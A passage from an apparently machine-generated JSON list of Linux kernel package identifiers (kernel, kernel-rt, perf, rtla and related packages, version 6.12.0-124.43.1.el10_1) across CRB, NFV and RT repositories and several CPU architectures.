"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
